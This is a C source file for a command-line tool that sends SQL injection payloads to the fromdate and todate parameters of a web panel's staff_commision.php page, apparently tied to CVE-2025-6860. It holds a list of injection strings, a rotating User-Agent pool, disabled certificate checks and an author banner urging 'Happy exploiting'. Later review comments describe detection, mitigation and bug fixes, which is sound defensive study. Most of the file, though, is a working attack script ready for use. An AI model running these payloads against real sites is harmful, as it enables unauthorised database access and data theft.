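/*
 * Error-based SQL injection probe for the fromdate/todate parameters of
 * /panel/staff_commision.php. The tool's own messages tie it to CVE-2025-6860.
 *
 * What it puts on the wire (useful when writing detections):
 *   - one GET per entry of p[] to
 *       <url>/panel/staff_commision.php?fromdate=<entry>&todate=<entry>
 *     with the same entry in both parameters;
 *   - a User-Agent taken in order from the fixed list a[].
 *
 * How it decides: a 2xx answer whose body contains any string from sq[] is
 * reported as a hit. That only works when the application echoes database or
 * driver error text to the client, and several markers ("Fatal error",
 * "Database error", "Unhandled Exception") are generic, so a hit is an
 * indication and not proof.
 *
 * Mitigation on the application side: bind fromdate/todate as query
 * parameters, validate them as dates, and do not return database error text
 * in responses.
 */

/* Needed for nanosleep()/execve() declarations when built with -std=c11. */
#define _POSIX_C_SOURCE 200809L

/*
 * NOTE(review): the header names were stripped from this page ("#include
 * #include ..."); the list below is what the code in this file needs.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
#include <curl/curl.h>
#include "argparse.h"

/* Growable, NUL-terminated buffer that collects one HTTP response body. */
struct Mem
{
    char *buffer; /* heap storage, NULL until the first body chunk arrives */
    size_t len;   /* bytes stored, not counting the terminating NUL */
};

/* Probe values; each one is used for both fromdate and todate. */
const char *p[] =
{
    "' OR 1 -- -",
    "\" OR \"\" = \"",
    " OR 1 = 1 -- -",
    "' OR '' = '",
    "AND 1",
    "AND 0",
    "AND true",
    "AND false",
    "1-false",
    "-1 UNION SELECT 1 INTO @,@,@",
    "admin' or '1'='1",
    "admin' or '1'='1'--",
    "admin' or '1'='1'#",
    "-",
    " ",
    "&",
    "^",
    "*"
};

/*
 * Response markers: database / driver error strings. If any of these can
 * appear in a production response, error output is reaching clients.
 */
const char *sq[] =
{
    "syntax error",
    "Warning: mysql_fetch_assoc()",
    "Warning: mysqli_query()",
    "SQLSTATE",
    "Invalid query",
    "Unclosed quotation mark",
    "quoted string not properly terminated",
    "You have an error in your SQL syntax",
    "Warning: pg_query()",
    "Warning: pg_send_query()",
    "pg_query(): Query failed",
    "Microsoft OLE DB Provider for SQL Server",
    "Incorrect syntax near",
    "Unclosed quotation mark after the character string",
    "SQL error",
    "mysql_num_rows() expects parameter",
    "mysql_fetch_array() expects parameter",
    "Fatal error",
    "mysql_fetch_object() expects parameter",
    "mysqli_fetch_assoc() expects parameter",
    "mysql_fetch_row() expects parameter",
    "supplied argument is not a valid MySQL",
    "Warning: mssql_query()",
    "syntax error at or near",
    "org.hibernate.exception",
    "unexpected end of SQL command",
    "SQL query failed",
    "database query error",
    "DB2 SQL error",
    "OLE DB provider returned message",
    "JDBC SQL error",
    "pg_fetch_array() expects parameter",
    "pg_fetch_assoc() expects parameter",
    "Query execution failed",
    "Database error",
    "Unhandled Exception",
    "ORA-00933: SQL command not properly ended",
    "ORA-01756: quoted string not properly terminated",
    "SQL Server Error",
    "mysql_numrows() expects parameter",
    "mysql_num_fields() expects parameter",
    "Syntax error or access violation",
    "SQL syntax error",
    "NativeError",
    "ODBC SQL Server Driver",
    "Warning: odbc_exec()",
    "Warning: odbc_prepare()",
    "Fatal error: Call to a member function",
};

/* Fixed User-Agent pool; g() hands these out in order, wrapping around. */
const char *a[] =
{
    "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36",
    "Mozilla/5.0 (Linux; Android 4.4.2; SM-P600 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0",
    "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.22 Safari/537.36",
    "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; 360SE)",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36",
    "Mozilla/5.0 (X11; CrOS x86_64 6812.88.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.153 Safari/537.36",
    "Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0"
};

/**
 * libcurl write callback: append one body chunk to the struct Mem behind
 * userdata and keep the buffer NUL-terminated.
 *
 * @param ptr      chunk delivered by libcurl
 * @param size     element size
 * @param nmemb    element count; the chunk is size * nmemb bytes
 * @param userdata the struct Mem registered with CURLOPT_WRITEDATA
 * @return bytes consumed, or 0 when the buffer cannot grow (a count that
 *         differs from the chunk size makes libcurl abort the transfer)
 */
size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
{
    struct Mem *m = userdata;
    size_t total = size * nmemb;

    /* Go through a temporary so the old buffer survives a failed realloc. */
    char *tmp = realloc(m->buffer, m->len + total + 1);
    if (!tmp)
    {
        return 0;
    }

    m->buffer = tmp;
    memcpy(m->buffer + m->len, ptr, total);
    m->len += total;
    m->buffer[m->len] = '\0';
    return total;
}

/**
 * Set the next User-Agent from a[] on the handle.
 *
 * The position is kept in a function-local static, so the rotation is shared
 * by every caller and is not thread-safe.
 */
void g(CURL *curl)
{
    static size_t next = 0;
    const size_t count = sizeof(a) / sizeof(a[0]);

    curl_easy_setopt(curl, CURLOPT_USERAGENT, a[next]);
    next = (next + 1) % count;
}

/**
 * Send one request per entry of p[] against the base URL u and report
 * whether a response body contains one of the markers in sq[].
 *
 * @param u base URL; "/panel/staff_commision.php?fromdate=..&todate=.." is
 *          appended to it
 *
 * Terminates the process with status 1 when a transfer fails or the request
 * URL does not fit the local buffer.
 */
void sd(const char *u)
{
    const char *m1 = "\e[1;32m[+] Don't forget to put a correct link consisting of the parameters that suffer from the vulnerability.\n";
    const char *m2 = "\n\e[1;32m[+] which are fromdate and todate.\n";
    const char *m3 = "\n\e[1;34m[+] Exploitation of CVE-2025-6860 has begun...";

    /*
     * The original wrote these through hand-rolled write(2) syscalls in
     * inline asm: the clobber lists did not name rcx/r11 (which the syscall
     * instruction overwrites), each length was strlen() - 1 so the last byte
     * was dropped, and the third length was computed from m2 instead of m3.
     * Going through stdio removes all three problems and keeps the output
     * ordered with the printf() calls below.
     */
    fputs(m1, stdout);
    fputs(m2, stdout);
    fputs(m3, stdout);

    CURL *curl = curl_easy_init();
    if (curl == NULL)
    {
        const char *i = "/sbin/ifconfig";
        const char *e1 = "\n\e[1;31m[-] Error Create Object Curl, Please Check Your Connection\n";
        const char *e2 = "\n\e[1;31m[-] Exemple Command : ping google.com / ifconfig \n";
        const char *e3 = "\n\e[1;36m[+] Start Command ifconfig For check Ip And Connection...\n";

        fputs(e1, stdout);
        fputs(e2, stdout);
        fputs(e3, stdout);
        fflush(stdout); /* exec replaces the process image; flush first */

        /*
         * The original passed argv = {NULL, path}: argv[0] was NULL and the
         * array had no terminator. Build a well-formed vector; the
         * environment stays empty, as before.
         */
        char *const child_argv[] = { (char *)i, NULL };
        char *const child_envp[] = { NULL };
        execve(i, child_argv, child_envp);
        _exit(EXIT_FAILURE); /* only reached when execve() itself failed */
    }

    char f[2043];
    CURLcode r;
    struct Mem chunk = {NULL, 0};
    const size_t np = sizeof(p) / sizeof(p[0]);
    const size_t csq = sizeof(sq) / sizeof(sq[0]);
    const struct timespec req = { .tv_sec = 0, .tv_nsec = 500000000L };

    for (size_t k = 0; k < np; k++)
    {
        const char *fp = p[k];

        /*
         * Start every request with an empty body. The original kept
         * appending to the same buffer, so one marker seen early was
         * reported again for every later request.
         */
        free(chunk.buffer);
        chunk.buffer = NULL;
        chunk.len = 0;

        int n = snprintf(f, sizeof(f), "%s/panel/staff_commision.php?fromdate=%s&todate=%s", u, fp, fp);
        if (n < 0 || (size_t)n >= sizeof(f))
        {
            /* A truncated URL would be requested silently otherwise. */
            fprintf(stderr, "\n\e[1;31m[-] Target URL is too long for the request buffer\n");
            curl_easy_cleanup(curl);
            exit(1);
        }
        curl_easy_setopt(curl, CURLOPT_URL, f);

        /*
         * NOTE(review): this list is built and freed, but no call in this
         * file passes it to the handle, so it does not describe what goes on
         * the wire. Detections should key on the URL pattern rather than on
         * these header values.
         */
        struct curl_slist *h = NULL;
        h = curl_slist_append(h, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
        h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br");
        h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5");
        h = curl_slist_append(h, "Connection: keep-alive");
        h = curl_slist_append(h, "Referer: http://example.com/");
        h = curl_slist_append(h, "Cache-Control: no-cache");
        h = curl_slist_append(h, "Pragma: no-cache");

        /*
         * Pause between requests. The original issued the nanosleep syscall
         * by hand with rdi set to 1 instead of &req, which the kernel
         * rejects, so no pause ever took place.
         */
        nanosleep(&req, NULL);

        curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
        g(curl);
        curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb);
        curl_easy_setopt(curl, CURLOPT_WRITEDATA, &chunk);
        /*
         * NOTE(review): certificate and host-name verification are switched
         * off, so the response being judged is not authenticated; anything
         * on the network path can supply or strip the markers.
         */
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
        curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);

        r = curl_easy_perform(curl);
        if (r != CURLE_OK)
        {
            fprintf(stderr, "\n\e[1;31m[-] curl_easy_perform() failed: %s\n", curl_easy_strerror(r));
            curl_slist_free_all(h);
            free(chunk.buffer);
            curl_easy_cleanup(curl);
            exit(1);
        }

        long ht = 0;
        printf("[+] Target URL : %s", u);
        fputs("\e[1;34m[+] Request Send Success !\n", stdout);
        printf("\e[1;34m[+] FULL URL : %s\n", f);
        curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &ht);
        printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);

        if (ht == 200 || ht == 201 || ht == 202 || ht == 203 || ht == 204 || ht == 206)
        {
            int found = 0;

            printf("\e[1;34m[+] The payload was successfully responded to by the server !\n");
            /*
             * The original also printed "The server has an SQL vulnerability"
             * at this point, before looking at the body, and so contradicted
             * the "not detected" branch below. The verdict is now left to
             * the marker scan.
             */

            /* An empty body (e.g. 204) leaves buffer NULL; do not scan it. */
            if (chunk.buffer != NULL)
            {
                for (size_t key = 0; key < csq; key++)
                {
                    if (strstr(chunk.buffer, sq[key]) != NULL)
                    {
                        found = 1;
                        break;
                    }
                }
            }

            if (found)
            {
                /* Heuristic: a marker matched, nothing more was verified. */
                printf("\e[1;34m[+] A suspicious word was found in a response !\n");
                printf("\e[1;34m[+] The server suffers from a CVE-2025-6860 vulnerability !\n");
            }
            else
            {
                printf("\e[1;31m[-] No suspicious patterns found in the server response, vulnerability CVE-2025-6860 not detected.\n");
                printf("\e[1;33m[!] Try to make sure that the link is correct and you can access it.\n");
            }
        }
        else
        {
            printf("\e[1;31m[-] Http Code Not 200 !\n");
            printf("\e[1;32m[+] HTTP CODE : %ld\n", ht);
            printf("\e[1;33m[!] Please Check Your Connection on Server !\n");
            printf("\e[1;33m[!] Exemple Command Check Access Connection : ping target.com\n");
        }

        curl_slist_free_all(h);
    }

    free(chunk.buffer);
    curl_easy_cleanup(curl);
}

/**
 * Entry point: print the banner, read -u/--url and hand the URL to sd().
 *
 * @return 0 after a run, EXIT_FAILURE when no URL was given
 */
int main(int argc, const char **argv)
{
    printf(
        "\e[1;31m"
        " ⢀⣠⣤⣶⣶⣿⣿⣿⣿⣿⣷⣶⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣤⣶⣶⡿⠿⢿⣿⣶⣶⣤⣄⡀⠀⠀⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⣠⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⠞⠋⠉⠀⠀⠀⠀⠀⠀⠀⠉⠛⢿⣿⣷⣄⠀⠀⠀\n"
        " ⠀⠀⠀⣠⣾⣿⣿⣿⣿⠿⠛⠉⠁⠀⠀⠀⠀⠉⠙⠻⢿⣿⣿⣿⣿⣄⠀⠀⠀⠀⠀⠀⠀⠀⣀⣴⣶⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣄⠀⠀\n"
        " ⠀⠀⣼⣿⣿⣿⡿⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣷⡀⠀⠀⠀⢀⣶⣿⣿⣿⣿⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀⠀\n"
        " ⠀⣼⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⣿⣿⣄⠀⠀⣿⣿⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣿⣿⣧⠀ \n"
        " ⢸⣿⣿⣿⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⢂⣾⣿⣿⣿⠿⠛⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ \n"
        " ⣿⣿⣿⣿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⡿⢡⣿⣿⣿⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿ \n"
        " ⣿⣿⣿⣿⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣱⣿⣿⣿⡿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⡇ \n"
        " ⢿⣿⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⣿⣿⣿⡟⣴⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⣿⡇ \n"
        " ⠸⣿⣿⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣿⣿⠏⢸⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⣿⣿ \n"
        " ⠀⢻⣿⣿⣿⣷⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣿⣿⣿⡿⠃⠀⠀⠹⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⠃⠀ \n"
        " ⠀⠀⠹⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⣿⠟⠁⠀⠀⠀⠀⠈⢻⣿⣿⣿⣷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⣾⣿⣿⡿⠃⠀⠀\n"
        " ⠀⠀⠀⠈⠻⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⣀⣀⣤⣶⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣿⣿⣶⣤⣀⣀⠀⠀⠀⢀⣀⣤⣶⣿⣿⣿⣿⠟⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⠈⠛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠛⠁⠀⠀⠀⠀\n"
        " ⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠻⠿⠿⠿⠿⠿⠟⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠛⠻⠿⢿⣿⣿⣿⠿⠿⠟⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀\n"
        "\e[1;37m\t\t\t\t\t@Byte Reaper\n"
    );
    printf("\e[1;37m=> My Telegram : @ByteReaper0\n");
    printf("\e[1;37m=> My Group : https://t.me/exploiterX0\n");
    printf("\e[1;34m[+] Happy exploiting !!\n");
    printf("\e[1;37m-------------------------------------------------------------------------------------------------------------------\n");

    const char *u = NULL;
    struct argparse_option options[] =
    {
        OPT_HELP(),
        OPT_STRING('u', "url", &u, "Enter Target URL"),
        OPT_END(),
    };
    struct argparse argparse;
    argparse_init(&argparse, options, NULL, 0);
    argparse_parse(&argparse, argc, argv);

    if (!u)
    {
        printf("\e[1;31m[-] Please Enter Target URL !\n");
        printf("\e[1;33m[!] Exemple : ./exploit -u http://target.com/panel/staff_commision.php?fromdate=&todate=\n");
        /*
         * The original left through a raw exit syscall with status 0. That
         * skips stdio flushing, so the two messages above could be lost when
         * stdout is not a terminal, and it reported success for a usage
         * error. Returning from main flushes and signals the failure.
         */
        return EXIT_FAILURE;
    }

    sd(u);
    return 0;
}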